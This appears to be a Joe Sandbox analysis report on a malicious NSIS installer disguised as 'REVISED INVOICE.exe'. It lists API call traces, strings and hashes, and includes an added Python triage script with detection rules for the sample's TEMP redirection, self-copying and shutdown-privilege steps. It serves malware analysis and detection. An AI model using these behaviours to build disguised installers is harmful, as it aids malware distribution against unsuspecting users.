                                                                                                [Entry function at 0040326A; the rendered graph marks basic blocks as executed or not executed and its node/edge data is omitted here. Recoverable flow: SetErrorMode, GetVersion -> resolve SETUPAPI/USERENV/UXTHEME via GetModuleHandle/GetProcAddress (call 4063f5), COMCTL32 #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW -> command-line parsing loop (CharNextW) -> GetTempPathW, or GetWindowsDirectoryW + lstrcatW "\Temp", or GetTempPathW + "Low", then SetEnvironmentVariableW TEMP and TMP -> DeleteFileW -> either OleUninitialize + ExitProcess, or build a "~nsu...tmp" directory name (lstrcatW x3), lstrcmpiW against the current directory, SetCurrentDirectoryW, DeleteFileW/CopyFileW loop with CloseHandle -> GetCurrentProcess, OpenProcessToken -> LookupPrivilegeValueW, AdjustTokenPrivileges -> ExitWindowsEx -> ExitProcess.]
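The "APIs" list that Joe Sandbox prints for a function (one line per call, in the form `Name.MODULE(arg1,arg2,...), ref: ADDRESS`, optionally prefixed with `Part of subcall function XXXXXXXX:`) is easy to triage mechanically when you have many reports to read. The Python below is an added example, not code from this report or from Joe Sandbox: it parses trace lines in that format into records and applies three rules for behaviours the entry function of this sample shows, namely pointing TEMP/TMP at a directory it controls, staging a copy of itself under a `~nsu*.tmp` directory, and adjusting token privileges before `ExitWindowsEx`. The sample trace is a constructed mix of lines copied from this report's API list plus two lines for `AdjustTokenPrivileges` and `ExitWindowsEx` that I built from the basic-block addresses in the control-flow graph (the argument values for those two are not in the report, so they are given without arguments); the rule names and the `ApiCall` record are mine.

```python
"""Triage helper for Joe Sandbox 'APIs' trace lines (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass

# One trace line: optional bullet, optional 'Part of subcall function X:' prefix,
# API.MODULE, optional (args), then 'ref: ADDRESS'.  COMCTL32 ordinals appear as '#17'.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # as printed; Joe Sandbox also prints stack residue past the real arguments
    ref: str            # return address inside the sample
    subcall_of: str = ""  # set when the line came from a 'Part of subcall function' entry


def split_args(raw):
    """Split the printed argument list on commas, but not on commas inside double quotes."""
    if not raw:
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return out


def parse_trace(lines):
    """Turn trace lines into ApiCall records; headings, blank lines and graph residue are skipped."""
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            calls.append(ApiCall(m["api"], m["mod"], split_args(m["args"]), m["ref"].upper(), m["sub"] or ""))
    return calls


def triage(calls):
    """Apply three behaviour rules and return human-readable findings in trace order."""
    findings = []
    env = [c for c in calls if c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in ("TEMP", "TMP")]
    if env:
        target = env[0].args[1] if len(env[0].args) > 1 else "?"
        findings.append("redirects %s to %s" % ("/".join(c.args[0] for c in env), target))
    if any(c.api == "lstrcatW" and "~nsu" in c.args for c in calls) and any(c.api == "CopyFileW" for c in calls):
        findings.append("stages a copy of itself under a ~nsu*.tmp directory")
    priv = next((i for i, c in enumerate(calls) if c.api == "AdjustTokenPrivileges"), None)
    if priv is not None and any(c.api == "ExitWindowsEx" for c in calls[priv + 1:]):
        findings.append("adjusts token privileges and then calls ExitWindowsEx (shutdown/reboot capability)")
    return findings


# Constructed sample: lines copied from this report's API list, plus a heading line that must be
# skipped and two lines (AdjustTokenPrivileges, ExitWindowsEx) built from the graph's block addresses.
SAMPLE_TRACE = r"""APIs
• SetErrorMode.KERNELBASE ref: 0040328C
• GetVersion.KERNEL32 ref: 00403292
• #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000), ref: 0040332D
  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 004035F5
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 0040360F
• CopyFileW.KERNEL32 ref: 004036A5
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
• AdjustTokenPrivileges.ADVAPI32 ref: 00403740
• ExitWindowsEx.USER32 ref: 00403762
"""

if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE.splitlines())
    for finding in triage(parsed):
        print(finding)
```

The regex keeps the quoted command-line path intact because `split_args` only breaks on commas outside double quotes; the `Part of subcall function` prefix is retained in `subcall_of` so a rule can distinguish direct calls from calls made by a shared helper such as the `GetModuleHandle`/`GetProcAddress` resolver at 004063F5.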
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE ref: 0040328C
                                                                                                • GetVersion.KERNEL32 ref: 00403292
                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
                                                                                                • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                                                • SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
                                                                                                • GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000), ref: 0040332D
                                                                                                • CharNextW.USER32(00000000), ref: 00403354
                                                                                                  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                                                  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034A0
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034AC
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004034C0
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C8
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
                                                                                                • DeleteFileW.KERNEL32(1033), ref: 004034F5
                                                                                                  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                                                • OleUninitialize.OLE32(?), ref: 004035C0
                                                                                                • ExitProcess.KERNEL32 ref: 004035E2
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 004035F5
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 00403604
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 0040360F
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 0040361B
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403637
                                                                                                • DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,0042A000,?), ref: 00403691
                                                                                                • CopyFileW.KERNEL32 ref: 004036A5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004036D2
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403708
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403740
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
                                                                                                • ExitProcess.KERNEL32 ref: 00403788
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\fona\Kvit$C:\Users\user\AppData\Local\fona\Kvit$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                • API String ID: 3586999533-2447905027
                                                                                                • Opcode ID: 18b875ca129c5a4b12c60ae53fdc6c4b39169b05244e9a0f0d81940a8b3f60a9
                                                                                                • Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
                                                                                                • Opcode Fuzzy Hash: 18b875ca129c5a4b12c60ae53fdc6c4b39169b05244e9a0f0d81940a8b3f60a9
                                                                                                • Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E

                                                                                                 Control-flow Graph (graph rendering omitted; function 00404AFA)
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B12
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B1D
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
                                                                                                • LoadBitmapW.USER32 ref: 00404B7A
                                                                                                • SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
                                                                                                • DeleteObject.GDI32(00000000), ref: 00404BF0
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D4A
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F1A
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F2A
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050C9
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004050D4
                                                                                                • ShowWindow.USER32(00000000), ref: 004050DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                                                • Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
                                                                                                • Opcode Fuzzy Hash: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                                                • Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58

                                                                                                 Control-flow Graph (graph rendering omitted; function 00406041)
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,004216E8,?,004051B5,004216E8,00000000,00000000,0040FEC0), ref: 00406104
                                                                                                • GetSystemDirectoryW.KERNEL32(antireform,00000400), ref: 00406182
                                                                                                • GetWindowsDirectoryW.KERNEL32(antireform,00000400), ref: 00406195
                                                                                                • SHGetFolderPathW.SHELL32(?,00000000,00000000,antireform), ref: 004061BD
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
                                                                                                • SHGetPathFromIDListW.SHELL32(?,antireform), ref: 004061DF
                                                                                                • CoTaskMemFree.OLE32(?), ref: 004061EA
                                                                                                • lstrcatW.KERNEL32(antireform,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
                                                                                                • lstrlenW.KERNEL32(antireform,00000000,004216E8,?,004051B5,004216E8,00000000,00000000,0040FEC0), ref: 00406268
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antireform
                                                                                                • API String ID: 3575957451-816509579
                                                                                                • Opcode ID: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                                                • Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
                                                                                                • Opcode Fuzzy Hash: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                                                • Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E

                                                                                                 Control-flow Graph (graph rendering omitted; function 00405810)
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405839
                                                                                                • lstrcatW.KERNEL32(00424710,\*.*,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405881
                                                                                                • lstrcatW.KERNEL32(?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058A4
                                                                                                • lstrlenW.KERNEL32(?,?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058AA
                                                                                                • FindFirstFileW.KERNELBASE(00424710,?,?,?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058BA
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405969
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040581D
                                                                                                • "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 00405819
                                                                                                • \*.*, xrefs: 0040587B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-1577576717
                                                                                                • Opcode ID: 444c957dec2a676252e87809a4c54072b8c76e9a6927f2055d166312a46e5fa8
                                                                                                • Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
                                                                                                • Opcode Fuzzy Hash: 444c957dec2a676252e87809a4c54072b8c76e9a6927f2055d166312a46e5fa8
                                                                                                • Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                                                • Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
                                                                                                • Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                                                • Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(7570D4C4,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040636D
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406379
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID: XWB
                                                                                                • API String ID: 2295610775-4039527733
                                                                                                • Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                                                • Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
                                                                                                • Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                                                • Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(0040749C,?,00000001,0040748C,?), ref: 00402114
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00402154
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: C:\Users\user\AppData\Local\fona\Kvit
                                                                                                • API String ID: 542301482-989027284
                                                                                                • Opcode ID: 320fb439ea4e888771484c94230a40a89910293f2e172b1d57c34123c0f06ddb
                                                                                                • Instruction ID: 6cbe38940624da38e40774ab578681f1f604b85ca8fb8198b005fe2b44c0e728
                                                                                                • Opcode Fuzzy Hash: 320fb439ea4e888771484c94230a40a89910293f2e172b1d57c34123c0f06ddb
                                                                                                • Instruction Fuzzy Hash: A7411D75A00208AFCF00DFA4CD889AD7BB5FF48314B20457AF515EB2D1D7799A41CB55
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: f38b5e3cf6ff4c4fc5999f7d2d4492e5b1947f8a2322db42d1fcf1e91754c34c
                                                                                                • Instruction ID: 5886dfe4bc611d4993f15ed40ae28ce81127269af5662ddb55851ccd49cbf6f1
                                                                                                • Opcode Fuzzy Hash: f38b5e3cf6ff4c4fc5999f7d2d4492e5b1947f8a2322db42d1fcf1e91754c34c
                                                                                                • Instruction Fuzzy Hash: 10F05E71A00115ABC711EFA4DD49AAEB378FF04324F1005BBF105E21E1D6B89A409B29

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
                                                                                                • ShowWindow.USER32(?), ref: 00403C64
                                                                                                • DestroyWindow.USER32 ref: 00403C78
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CB5
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403CD0
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403D7E
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403D88
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E99
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EBA
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECC
                                                                                                • EnableWindow.USER32(?,?), ref: 00403EE7
                                                                                                • GetSystemMenu.USER32 ref: 00403EFD
                                                                                                • EnableMenuItem.USER32 ref: 00403F04
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
                                                                                                • lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
                                                                                                • SetWindowTextW.USER32(?,00422708,00000000,00422708,?,00422708,00428220), ref: 00403F6C
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040A0
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                                                • Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
                                                                                                • Opcode Fuzzy Hash: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                                                • Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                                                  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
                                                                                                • lstrcatW.KERNEL32(1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,7570D4C4,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004038E9
                                                                                                • lstrlenW.KERNEL32(antireform,?,?,?,antireform,00000000,C:\Users\user\AppData\Local\fona\Kvit,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,7570D4C4), ref: 00403969
                                                                                                • lstrcmpiW.KERNEL32(?,.exe,antireform,?,?,?,antireform,00000000,C:\Users\user\AppData\Local\fona\Kvit,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
                                                                                                • GetFileAttributesW.KERNEL32(antireform), ref: 00403987
                                                                                                • LoadImageW.USER32 ref: 004039D0
